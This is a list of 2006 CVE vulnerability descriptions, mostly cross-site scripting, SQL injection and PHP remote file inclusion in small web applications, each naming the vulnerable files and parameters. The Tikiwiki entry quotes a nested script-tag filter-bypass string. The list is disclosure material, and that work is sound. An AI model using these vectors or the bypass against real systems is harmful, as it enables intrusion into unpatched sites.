[CVE-2006-2883] Cross-site scripting (XSS) vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2006-2882] Multiple cross-site scripting (XSS) vulnerabilities in submit.asp in ASPScriptz Guest Book 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) GBOOK_UNAME, (2) GBOOK_EMAIL, (3) GBOOK_CITY, (4) GBOOK_COU, (5) GBOOK_WWW, and (6) GBOOK_MESS form fields.
[CVE-2006-2880] Cross-site scripting (XSS) vulnerability in the Contributed Packages for PyBlosxom 1.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the Comments plugin in the (1) url and (2) author fields.
[CVE-2006-2876] Cross-site scripting (XSS) vulnerability in cat.php in PHP Pro Publish 2.0 allows remote attackers to inject arbitrary web script or HTML via the catname parameter. NOTE: the provenance of this information is unknown
[CVE-2006-2873] Cross-site scripting (XSS) vulnerability in hava.asp in Enigma Haber 4.2 allows remote attackers to inject arbitrary web script or HTML via the il parameter. NOTE: the provenance of this information is unknown
[CVE-2006-2870] Cross-site scripting (XSS) vulnerability in forum_search.asp in Intelligent Solutions Inc. ASP Discussion Forum allows remote attackers to inject arbitrary web script or HTML via the search variable.
[CVE-2006-2860] PHP remote file inclusion vulnerability in Webspotblogging 3.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) inc/logincheck.inc.php, (2) inc/adminheader.inc.php, (3) inc/global.php, or (4) inc/mainheader.inc.php. NOTE: some of these vectors were also reported for 3.0 in a separate disclosure.
[CVE-2006-2851] Cross-site scripting (XSS) vulnerability in index.php in dotProject 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, which are not properly handled when the client is using Internet Explorer.
[CVE-2006-2850] Cross-site scripting (XSS) vulnerability in recentchanges.php in PHP Labware LabWiki 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the help parameter.
[CVE-2006-2849] PHP remote file inclusion vulnerability in includes/webdav/server.php in Bytehoard 2.1 Epsilon/Delta allows remote attackers to execute arbitrary PHP code via a URL in the bhconfig[bhfilepath] parameter.
[CVE-2006-2848] links.asp in aspWebLinks 2.0 allows remote attackers to change the administrative password, possibly via a direct request with a modified txtAdministrativePassword field.
[CVE-2006-2847] SQL injection vulnerability in links.asp in aspWebLinks 2.0 allows remote attackers to execute arbitrary SQL commands via the linkID parameter.
[CVE-2006-2846] Cross-site scripting (XSS) vulnerability in Print.PHP in VisionGate Portal System allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: The provenance of this information is unknown
[CVE-2006-2840] Cross-site scripting (XSS) vulnerability in (1) uploads.php and (2) "url links" in PmWiki 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
[CVE-2006-2839] Directory traversal vulnerability in PG Problem Editor module (PGProblemEditor.pm) in WeBWorK Online Homework Delivery System 2.2.0 and earlier allows remote attackers to read and write files outside of the templates directory.
[CVE-2006-2838] Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors. NOTE: By default, the connections are only allowed from the local host.
[CVE-2006-2837] Cross-site scripting (XSS) vulnerability in Techno Dreams Guest Book allows remote attackers to inject arbitrary web script or HTML via certain comment fields in the "Sign Our GuestBook" page, probably the x_Comments parameter to guestbookadd.asp.
[CVE-2006-2833] Cross-site scripting (XSS) vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable.
[CVE-2006-2832] Cross-site scripting (XSS) vulnerability in the upload module (upload.module) in Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2 allows remote attackers to inject arbitrary web script or HTML via the uploaded filename.
[CVE-2006-2830] Buffer overflow in TIBCO Rendezvous before 7.5.1, TIBCO Runtime Agent (TRA) before 5.4, and Hawk before 4.6.1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via the HTTP administrative interface.
[CVE-2006-2824] Logicalware MailManager before 2.0.10 does not remove 0xc8 0x27 (0xc8 followed by a single-quote character) from the data stream to the server, which allows remote attackers to modify data and gain administrative access when PostgreSQL is used, aka "bug #1494281 - Postgres encoding security hole." NOTE: while this issue involves PostgreSQL, it is specific to MailManager's interface to PostgreSQL and is therefore a different vulnerability than CVE-2006-2313 and CVE-2006-2314.
[CVE-2006-2823] Katrien De Graeve a.shopKart 2.0 (aka ashopKart20) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) admin/scart.mdb and possibly (2) admin/scart97.mdb.
[CVE-2006-2821] Multiple cross-site scripting (XSS) vulnerabilities in DeltaScripts Pro Publish allow remote attackers to inject arbitrary web script or HTML via the (1) artid parameter in art.php and the (2) catname parameter in cat.php.
[CVE-2006-2820] Cross-site scripting (XSS) vulnerability in HotWebScripts.com Weblog Oggi 1.0 allows remote attackers to inject arbitrary web script or HTML via a comment, possibly involving a javascript URI in the SRC attribute of an IMG element.
[CVE-2006-2816] Multiple cross-site scripting (XSS) vulnerabilities in index.php in coolphp magazine allow remote attackers to inject arbitrary web script or HTML via the (1) op and (2) nick parameters, and possibly the (3) 0000, (4) userinfo, (5) comp_der, (6) encuestas, and (7) pagina parameters. NOTE: it is not clear whether this is a distributable product or a site-specific vulnerability. If it is site-specific, then it should not be included in CVE.
[CVE-2006-2815] Multiple cross-site scripting (XSS) vulnerabilities in Two Shoes M-Factory (TSMF) SimpleBoard 1.1.0 Stable (aka com_simpleboard), as used in Mambo and Joomla!, allow remote attackers to inject arbitrary web script or HTML via (1) the Name field in "post ne topic" in the Frontend, (2) the Title (aka Community-Title) field in Simpleboard Configuration in the Backend Admin Panel, and the (3) Name (aka Forum-Title) and (4) Name (aka Category-Title) fields in Simpleboard Administration in the Backend Admin Panel. NOTE: some sources have stated that the sb_authorname parameter is affected, but it is unclear which field is related to it.
[CVE-2006-2812] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dominios Europa PICRATE (aka TAL RateMyPic) 1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the (1) name (aka nick), (2) email, and (3) comment boxes.
[CVE-2006-2810] Multiple cross-site scripting (XSS) vulnerabilities in Belchior Foundry vCard 2.9 allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) toprated.php and (2) newcards.php. NOTE: the card_id vector is already covered by CVE-2006-1230.
[CVE-2006-2809] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ar-blog 5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) count parameter, and possibly the (2) next, (3) Year_the_news, and (4) mo parameters. NOTE: the year and month vectors are already covered by CVE-2006-0333.
[CVE-2006-2808] Cross-site scripting (XSS) vulnerability in Lycos Tripod htmlGEAR guestGEAR (aka Guest Gear) allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element, followed by a double ">", which might bypass cleansing operations.
[CVE-2006-2807] ASPwebSoft Speedy Asp Discussion Forum allows remote attackers to change the password of any account via a modified account id and possibly arbitrary values of the name, email, country, password, and passwordre parameters to profileupdate.asp.
[CVE-2006-2804] Cross-site scripting (XSS) vulnerability in index.cfm in Goss Intelligent Content Management (iCM) 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown
[CVE-2006-2803] Multiple cross-site scripting (XSS) vulnerabilities in PHP ManualMaker 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to index.php, (2) search field (possibly the s parameter), or (3) comment field.
[CVE-2006-2800] Multiple cross-site scripting (XSS) vulnerabilities in Unak CMS 1.5 RC2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) u_a or (2) u_s parameters. NOTE: this might be resultant from SQL injection.
[CVE-2006-2799] Cross-site scripting (XSS) vulnerability in content_footer.php in toendaCMS 0.7.0 allows remote attackers to inject arbitrary web scripts or HTML via the print_url variable. NOTE: the provenance of this information is unknown
[CVE-2006-2798] Multiple cross-site scripting (XSS) vulnerabilities in phpCommunityCalendar 4.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) LoName parameter in (a) week.php and (b) month.php and (2) AddressLink parameter in (c) event.php.
[CVE-2006-2796] Cross-site scripting (XSS) vulnerability in gallery.php in Captivate 1.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter, which is reflected in an error message.
[CVE-2006-2795] Multiple cross-site scripting (XSS) vulnerabilities in XiTi Tracking Script 6 and 7 RC allow remote attackers to inject arbitrary web script or HTML via (1) the xtref parameter in xiti.js and (2) an HTTP Referer header field. NOTE: the provenance of this information is unknown
[CVE-2006-2785] Cross-site scripting (XSS) vulnerability in Mozilla Firefox before 1.5.0.4 allows user-assisted remote attackers to inject arbitrary web script or HTML by tricking a user into (1) performing a "View Image" on a broken image in which the SRC attribute contains a Javascript URL, or (2) selecting "Show only this frame" on a frame whose SRC attribute contains a Javascript URL.
[CVE-2006-2784] The PLUGINSPAGE functionality in Mozilla Firefox before 1.5.0.4 allows remote user-assisted attackers to execute privileged code by tricking a user into installing missing plugins and selecting the "Manual Install" button, then using nested javascript: URLs. NOTE: the manual install button is used for downloading software from a remote web site, so this issue would not cross privilege boundaries if the user progresses to the point of installing malicious software from the attacker-controlled site.
[CVE-2006-2777] Unspecified vulnerability in Mozilla Firefox before 1.5.0.4 and SeaMonkey before 1.0.2 allows remote attackers to execute arbitrary code by using the nsISelectionPrivate interface of the Selection object to add a SelectionListener and create notifications that are executed in a privileged context.
[CVE-2006-2774] Cross-site scripting (XSS) vulnerability in search.php in QontentOne CMS allows remote attackers to inject arbitrary web script or HTML via the search_phrase parameter.
[CVE-2006-2772] Cross-site scripting (XSS) vulnerability in add.asp in Hogstorps hogstorp guestbook 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, and (3) headline parameters. NOTE: the provenance of this information is unknown
[CVE-2006-2765] Cross-site scripting (XSS) vulnerability in news_information.php in Interlink Advantage allows remote attackers to inject arbitrary web script or HTML via the flag parameter.
[CVE-2006-2764] Cross-site scripting (XSS) vulnerability in GuestbookXL 1.3 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in an IMG tag in a comment field to (1) guestwrite.php or (2) guestbook.php.
[CVE-2006-2762] PHP remote file inclusion vulnerability in includes/config.php in WebCalendar 1.0.3 allows remote attackers to execute arbitrary PHP code via a URL in the includedir parameter, which is remotely accessed in an fopen call whose results are used to define a user_inc setting that is used in an include_once call.
[CVE-2006-2757] Cross-site scripting (XSS) vulnerability in Chipmunk guestbook allows remote attackers to inject arbitrary web script or HTML via the (1) start parameter in (a) index.php
[CVE-2006-2756] Eitsop My Web Server 1.0 allows remote attackers to cause a denial of service (application crash) via a long GET request. NOTE: CVE analysis suggests that this is a different product, and therefore a different vulnerability, than CVE-2002-1897.
[CVE-2006-2755] Cross-site scripting (XSS) vulnerability in index.php in UBBThreads 5.x and earlier allows remote attackers to inject arbitrary web script or HTML via the debug parameter, as demonstrated by stealing MD5 hashes of passwords.
[CVE-2006-2751] Cross-site scripting (XSS) vulnerability in Open Searchable Image Catalogue (OSIC) 0.7.0.1 and earlier allows remote attackers to inject arbitrary web scripts or HTML via the item_list parameter in search.php.
[CVE-2006-2750] Cross-site scripting (XSS) vulnerability in the do_mysql_query function in core.php for Open Searchable Image Catalogue (OSIC) before 0.7.0.1 allows remote attackers to inject arbitrary web scripts or HTML via failed SQL queries, which is reflected in an error message.
[CVE-2006-2746] Multiple cross-site scripting (XSS) vulnerabilities in F@cile Interactive Web 0.8.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) lang parameter in index.php, and the (2) mytheme and (3) myskin parameters in multiple "p-themes" index.inc.php files including (c) lowgraphic, (d) classic, (e) puzzle, (f) simple, and (g) ciao. NOTE: vectors 2 and 3 might be resultant from file inclusion issues.
[CVE-2006-2745] Multiple PHP remote file inclusion vulnerabilities in F@cile Interactive Web 0.8.5 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) pathfile parameter in (a) p-editpage.php and (b) p-editbox.php, and the (2) mytheme and (3) myskin parameters in multiple "p-themes" index.inc.php files including (c) lowgraphic, (d) classic, (e) puzzle, (f) simple, and (g) ciao.
[CVE-2006-2744] PHP remote file inclusion vulnerability in p-popupgallery.php in F@cile Interactive Web 0.8.41 through 0.8.5 allows remote attackers to execute arbitrary PHP code via a URL in the l parameter.
[CVE-2006-2741] Cross-site scripting (XSS) vulnerability in Epicdesigns tinyBB 0.3 allows remote attackers to inject arbitrary web script or HTML via the q parameter in forgot.php, which is echoed in an error message, and other unspecified vectors.
[CVE-2006-2729] Cross-site scripting (XSS) vulnerability in superalbum/index.php in Photoalbum B&W 1.3 allows remote attackers to inject arbitrary web script or HTML via the gal parameter. NOTE: the provenance of this information is unknown
[CVE-2006-2728] Cross-site scripting (XSS) vulnerability in superalbum/index.php in Photoalbum B&W 1.3 allows remote attackers to inject arbitrary web script or HTML via the pic parameter.
[CVE-2006-2724] Cross-site scripting (XSS) vulnerability in PunBB 1.2.11 allows remote authenticated administrators to inject arbitrary HTML or web script to other administrators via the "Admin note" feature, a different vulnerability than CVE-2006-2227.
[CVE-2006-2723] Unspecified versions of Mozilla Firefox allow remote attackers to cause a denial of service (crash) via a web page that contains a large number of nested marquee tags. NOTE: a followup post indicated that the initial report could not be verified.
[CVE-2006-2721] Cross-site scripting (XSS) vulnerability in news.php in VARIOMAT allows remote attackers to inject arbitrary HTML or web script via the subcat parameter. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2699] Cross-site scripting (XSS) vulnerability in getimage.php in Geeklog 1.4.0sr2 and earlier allows remote attackers to inject arbitrary HTML or web script via the image argument in a show action.
[CVE-2006-2696] Cross-site scripting (XSS) vulnerabilities in Easy-Content Forums 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) startletter parameter in userview.asp and the (2) catid parameter in topics.asp.
[CVE-2006-2692] Multiple unspecified vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to read arbitrary image, HTML, or PHP files via unknown vectors, probably related to directory traversal.
[CVE-2006-2691] Unspecified "information leakage" vulnerabilities in aMuleWeb for AMule before 2.1.2 allow remote attackers to access arbitrary images, including dynamically generated images, via unknown vectors.
[CVE-2006-2690] An unspecified script in EVA-Web 2.1.2 and earlier, probably index.php, allows remote attackers to obtain the full path of the web server via invalid (1) perso or (2) aide parameters.
[CVE-2006-2689] Multiple cross-site scripting (XSS) vulnerabilities in EVA-Web 2.1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) debut_image parameter in (a) article-album.php3, (2) date parameter in (b) rubrique.php3, and the (3) perso and (4) aide parameters to (c) an unknown script, probably index.php.
[CVE-2006-2687] Cross-site scripting (XSS) vulnerability in adduser.php in PHP-AGTC Membership System 1.1a and earlier allows remote attackers to inject arbitrary web script or HTML via the email address (useremail parameter).
[CVE-2006-2684] Cross-site scripting (XSS) vulnerability in the search module in CMS Mundo 1.0 allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
[CVE-2006-2680] Cross-site scripting (XSS) vulnerability in index.php in AZ Photo Album Script Pro allows remote attackers to inject arbitrary web script or HTML via the gazpart parameter.
[CVE-2006-2679] Unspecified vulnerability in the VPN Client for Windows Graphical User Interface (GUI) (aka the VPN client dialer) in Cisco VPN Client for Windows 4.8.00.* and earlier, except for 4.7.00.0533, allows local authenticated, interactive users to gain privileges, possibly due to privileges of dialog boxes, aka bug ID CSCsd79265.
[CVE-2006-2678] Multiple cross-site scripting (XSS) vulnerabilities in Pre News Manager 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to (a) index.php, and the (2) nid parameter to (b) news_detail.php, (c) email_story.php, (d) thankyou.php, (e) printable_view.php, (f) tella_friend.php, and (g) send_comments.php.
[CVE-2006-2677] SiteScape Forum 7.2 and possibly earlier stores the avf.rc configuration file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive path information.
[CVE-2006-2673] Cross-site scripting (XSS) vulnerability in search.html in Bulletin Board Elite-Board (E-Board) 1.1 allows remote attackers to inject arbitrary web script or HTML via the search box.
[CVE-2006-2672] Multiple cross-site scripting (XSS) vulnerabilities in Realty Pro One allow remote attackers to inject arbitrary web script or HTML via the (1) listingid parameter to (a) images.php, (b) index_other.php, or (c) request_info.php.
[CVE-2006-2670] Multiple cross-site scripting (XSS) vulnerabilities in ChatPat 1.0 allow remote attackers to inject arbitrary web script or HTML via a chat message in (1) fastchat.php and (2) fastshow.php.
[CVE-2006-2669] Multiple cross-site scripting (XSS) vulnerabilities in Pre Shopping Mall 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) search parameter in search.php (the "search box"), (2) the prodid parameter in detail.php, and the (3) cid parameter in products.php.
[CVE-2006-2666] PHP remote file inclusion vulnerability in includes/mailaccess/pop3.php in V-Webmail 1.5 through 1.6.4 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[pear_dir] parameter.
[CVE-2006-2665] PHP remote file inclusion vulnerability in includes/mailaccess/pop3/core.php in V-Webmail 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG[pear_dir] parameter.
[CVE-2006-2664] Cross-site scripting (XSS) vulnerability in iFdate 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) password fields, or certain other input text boxes.
[CVE-2006-2663] Multiple cross-site scripting (XSS) vulnerabilities in iFlance 1.1 allow remote attackers to inject arbitrary web script or HTML via certain inputs to (1) acc_verify.php or (2) project.php.
[CVE-2006-2658] Directory traversal vulnerability in the xsp component in mod_mono in Mono/C# web server, as used in SUSE Open-Enterprise-Server 1 and SUSE Linux 9.2 through 10.0, allows remote attackers to read arbitrary files via a .. (dot dot) sequence in an HTTP request.
[CVE-2006-2653] Cross-site scripting (XSS) vulnerability in login_error.shtml for D-Link DSA-3100 allows remote attackers to inject arbitrary HTML or web script via an encoded uname parameter.
[CVE-2006-2652] Cross-site scripting (XSS) vulnerability in WikiNi 0.4.2 and earlier allows remote attackers to inject arbitrary HTML and web script by editing a Wiki page to contain the script.
[CVE-2006-2651] Cross-site scripting (XSS) vulnerability in index.php in Vacation Rental Script 1.0 allows remote attackers to inject arbitrary web script or HTML via the obj parameter.
[CVE-2006-2649] Multiple cross-site scripting (XSS) vulnerabilities in (a) search.php, (b) search_cat.php, (c) search_price.php, and (d) product_details.php in the cosmicshop directory for CosmicShoppingCart allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, as demonstrated by the (1) query parameter in search.php and the (2) data parameter in search_cat.php.
[CVE-2006-2648] Cross-site scripting (XSS) vulnerability in perform_search.asp for ASPBB 0.52 and earlier allows remote attackers to inject arbitrary HTML or web script via the search parameter.
[CVE-2006-2643] Cross-site scripting (XSS) vulnerability in index.php in Monster Top List (MTL) 1.4 allows remote attackers to inject arbitrary web script or HTML via the user_error_message parameter.
[CVE-2006-2642] ** UNVERIFIABLE ** NOTE: this issue does not contain any verifiable or actionable details. Cross-site scripting (XSS) vulnerability in Marco M. F. De Santis Php-residence 0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via "any of its input." NOTE: the original disclosure is based on vague researcher claims without vendor acknowledgement
[CVE-2006-2641] ** UNVERIFIABLE ** NOTE: this issue does not contain any verifiable or actionable details. Cross-site scripting (XSS) vulnerability in John Frank Asset Manager (AssetMan) 2.4a and earlier allows remote attackers to inject arbitrary web script or HTML via "any of its input." NOTE: the original disclosure is based on vague researcher claims without vendor acknowledgement
[CVE-2006-2640] Cross-site scripting (XSS) vulnerability in OmegaMw7a.ASP in OMEGA (aka Omegasoft) INterneSErvicesLosungen (INSEL) allows remote attackers to inject arbitrary web script or HTML via the WCE parameter.
[CVE-2006-2639] Cross-site scripting (XSS) vulnerability in the input forms in prattmic and Master5006 PHPSimpleChoose 0.3 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element.
[CVE-2006-2637] Cross-site scripting (XSS) vulnerability in view.php in TuttoPhp (1) Morris Guestbook 1, (2) Pretty Guestbook 1, and (3) Smile Guestbook 1 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the pagina parameter.
[CVE-2006-2635] Multiple cross-site scripting (XSS) vulnerabilities in Tikiwiki (aka Tiki CMS/Groupware) 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "<scr<script>ipt>" in the (1) offset and (2) days parameters in (a) tiki-lastchanges.php, the (3) find and (4) offset parameters in (b) tiki-orphan_pages.php, the (5) offset and (6) initial parameters in (c) tiki-listpages.php, and (7) an unspecified field in (d) tiki-remind_password.php.
[CVE-2006-2634] Cross-site scripting (XSS) vulnerability in Neocrome Land Down Under (LDU) in Neocrome Seditio 102 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer field.
[CVE-2006-2632] Cross-site scripting (XSS) vulnerability in Andrew Godwin ByteHoard 2.1 and earlier allows remote authenticated users to inject arbitrary web script or HTML via file descriptions.
[CVE-2006-2618] Cross-site scripting (XSS) vulnerability in (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, might allow remote attackers to inject arbitrary web script or HTML via the "write a review" box. NOTE: since user reviews do not require administrator privileges, and an auto-approve mechanism exists, this issue is a vulnerability.
[CVE-2006-2617] (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, allows remote attackers to obtain the installation path via an invalid entry in the Username field on the login page, which causes the path to be displayed in an SQL error. NOTE: this issue might be resultant from SQL injection.
[CVE-2006-2616] SQL injection vulnerability in the search script in (1) AlstraSoft Web Host Directory 1.2, aka (2) HyperStop WebHost Directory 1.2, allows remote attackers to execute arbitrary SQL commands via the uri parameter.
[CVE-2006-2610] Cross-site scripting (XSS) vulnerability in view.php in phpRaid 2.9.5 allows remote attackers to inject arbitrary web script or HTML via the (1) URL query string and the (2) Sort parameter.
[CVE-2006-2606] Cross-site scripting (XSS) vulnerability in Chatty, possibly 1.0.2 and other versions, allows remote attackers to inject arbitrary web script or HTML via the username.
[CVE-2006-2605] Cross-site scripting (XSS) vulnerability in DSChat 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the chatbox, probably involving the ctext parameter to send.php.
[CVE-2006-2587] Buffer overflow in the WebTool HTTP server component in (1) PunkBuster before 1.229, as used by multiple products including (2) America's Army 1.228 and earlier, (3) Battlefield 1942 1.158 and earlier, (4) Battlefield 2 1.184 and earlier, (5) Battlefield Vietnam 1.150 and earlier, (6) Call of Duty 1.173 and earlier, (7) Call of Duty 2 1.108 and earlier, (8) DOOM 3 1.159 and earlier, (9) Enemy Territory 1.167 and earlier, (10) Far Cry 1.150 and earlier, (11) F.E.A.R. 1.093 and earlier, (12) Joint Operations 1.187 and earlier, (13) Quake III Arena 1.150 and earlier, (14) Quake 4 1.181 and earlier, (15) Rainbow Six 3: Raven Shield 1.169 and earlier, (16) Rainbow Six 4: Lockdown 1.093 and earlier, (17) Return to Castle Wolfenstein 1.175 and earlier, and (18) Soldier of Fortune II 1.183 and earlier allows remote attackers to cause a denial of service (application crash) via a long webkey parameter.
[CVE-2006-2586] Cross-site scripting (XSS) vulnerability in IpLogger 1.7 and earlier allows remote attackers to inject arbitrary HTML or web script via the HTTP_REFERER header in an HTTP request.
[CVE-2006-2584] Multiple cross-site scripting (XSS) vulnerabilities in post.php in SkyeBox 1.2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name or (2) message parameters. NOTE: the provenance of this information is unknown.
[CVE-2006-2581] Cross-site scripting (XSS) vulnerability in Wiki content in RWiki 2.1.0pre1 through 2.1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors.
[CVE-2006-2572] Cross-site scripting (XSS) vulnerability in index.php in DGBook 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) homepage, (3) email, and (4) address parameters.
[CVE-2006-2571] Cross-site scripting (XSS) vulnerability in search.html in Alkacon OpenCms 6.0.0, 6.0.2, and 6.0.3 allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search action.
[CVE-2006-2567] Cross-site scripting (XSS) vulnerability in submit_article.php in Alstrasoft Article Manager Pro 1.6 allows remote attackers to inject arbitrary web script or HTML when submitting an article, as demonstrated using a javascript URI in a Cascading Style Sheets (CSS) property of a STYLE attribute of an element.
[CVE-2006-2564] Multiple cross-site scripting (XSS) vulnerabilities in index.php in AlstraSoft E-Friends allow remote attackers to inject arbitrary web script or HTML by (1) posting a blog, (2) posting a listing, (3) posting an event, (4) adding comments, or (5) sending a message.
[CVE-2006-2558] Cross-site scripting (XSS) vulnerability in IpLogger 1.7 and earlier allows remote attackers to inject arbitrary HTML or web script via the User-Agent (useragent) header in an HTTP request, which is not filtered when the log files are viewed.
[CVE-2006-2556] Cross-site scripting (XSS) vulnerability in Florian Amrhein NewsPortal before 0.37, and possibly TR Newsportal (TRanx rebuilded), allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2006-2553] Cross-site scripting (XSS) vulnerability in Jemscripts DownloadControl 1.0 allows remote attackers to inject arbitrary HTML or web script via the dcid parameter to dc.php. NOTE: the provenance of this information is unknown.
[CVE-2006-2546] A recommended admin password reset mechanism for BEA WebLogic Server 8.1, when followed before October 10, 2005, causes the administrator password to be stored in cleartext in the domain directory, which could allow attackers to gain privileges.
[CVE-2006-2545] Multiple cross-site scripting (XSS) vulnerabilities in Xtreme Topsites 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in stats.php and (2) unspecified inputs in lostid.php, probably the searchthis parameter. NOTE: one or more of these vectors might be resultant from SQL injection.
[CVE-2006-2536] Cross-site scripting (XSS) vulnerability in Destiney Links Script 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) "Search" (term parameter in index.php) and (2) "Add a Site" (add.php) fields.
[CVE-2006-2533] Cross-site scripting (XSS) vulnerability in (1) addWeblog.php and (2) leaveComments.php in Destiney Rated Images Script 0.5.0 does not properly filter all vulnerable HTML tags, which allows remote attackers to inject arbitrary web script or HTML via Javascript in a DIV tag.
[CVE-2006-2524] Cross-site scripting (XSS) vulnerability in UseBB 1.0 RC1 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when processing the user date format.
[CVE-2006-2522] Dayfox Blog 2.0 and earlier stores user credentials in edit/slog_users.txt under the web document root with insufficient access control, which allows remote attackers to gain privileges.
[CVE-2006-2518] Cross-site scripting (XSS) vulnerability in phpwcms 1.2.5-DEV allows remote attackers to inject arbitrary web script or HTML via the BL[be_cnt_plainhtml] parameter to include/inc_tmpl/content/cnt6.inc.php.
[CVE-2006-2517] SQL injection vulnerability in MyWeb Portal Office, Standard Edition, Public Edition, Medical Edition, Citizen Edition, School Edition, and Light Edition allows remote attackers to execute arbitrary SQL commands via unknown attack vectors.
[CVE-2006-2515] Cross-site scripting (XSS) vulnerability in index.php in Hiox Guestbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input forms for signing the guestbook.
[CVE-2006-2510] Cross-site scripting (XSS) vulnerability in the URL submission form in YourFreeWorld.com Short Url & Url Tracker Script allows remote attackers to inject arbitrary web script or HTML via an unspecified form for submitting URLs.
[CVE-2006-2506] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Sphider allow remote attackers to inject arbitrary web script or HTML via (1) the PATH_INFO and (2) the category parameter.
[CVE-2006-2501] Cross-site scripting (XSS) vulnerability in Sun ONE Web Server 6.0 SP9 and earlier, Java System Web Server 6.1 SP4 and earlier, Sun ONE Application Server 7 Platform and Standard Edition Update 6 and earlier, and Java System Application Server 7 2004Q2 Standard and Enterprise Edition Update 2 and earlier, allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors, possibly involving error messages.
[CVE-2006-2500] Cross-site scripting (XSS) vulnerability in add_news.asp in CodeAvalanche News (CANews) 1.2 allows remote attackers to inject arbitrary web script or HTML via the Headline field. NOTE: if this issue is limited to administrators, and if it is expected behavior for administrators to be able to generate HTML, then this is not a vulnerability.
[CVE-2006-2497] Multiple cross-site scripting (XSS) vulnerabilities in AspBB 0.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) action parameter to default.asp or (2) get parameter to profile.asp.
[CVE-2006-2491] Cross-site scripting (XSS) vulnerability in (1) index.php and (2) bmc/admin.php in BoastMachine (bMachine) 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string, which is not properly filtered when it is accessed using the $_SERVER["PHP_SELF"] variable.
[CVE-2006-2490] Multiple cross-site scripting (XSS) vulnerabilities in Mobotix IP Network Cameras M1 1.9.4.7 and M10 2.0.5.2, and other versions before 2.2.3.18 for M10/D10 and 3.0.3.31 for M22, allow remote attackers to inject arbitrary web script or HTML via URL-encoded values in (1) the query string to help/help, (2) the get_image_info_abspath parameter to control/eventplayer, and (3) the source_ip parameter to events.tar.
[CVE-2006-2488] Multiple cross-site scripting (XSS) vulnerabilities in Spymac WebOS (WOS) 5.0 allow remote attackers to inject arbitrary web script or HTML via the (1) del_folder, (2) nick, or (3) action parameters to (a) notes/index.php, (4) curr parameter to (b) ipod/get_ipod.php, and in (c) login.php.
[CVE-2006-2484] Cross-site scripting (XSS) vulnerability in index.html in IceWarp WebMail 5.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the PHPSESSID parameter.
[CVE-2006-2478] Bitrix Site Manager 4.1.x allows remote attackers to redirect users to other websites via a modified back_url during a HTTP POST request. NOTE: this issue has been referred to as "cross-site scripting," but that is inconsistent with the common use of the term.
[CVE-2006-2476] Bitrix Site Manager 4.1.x stores updater.log under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information.
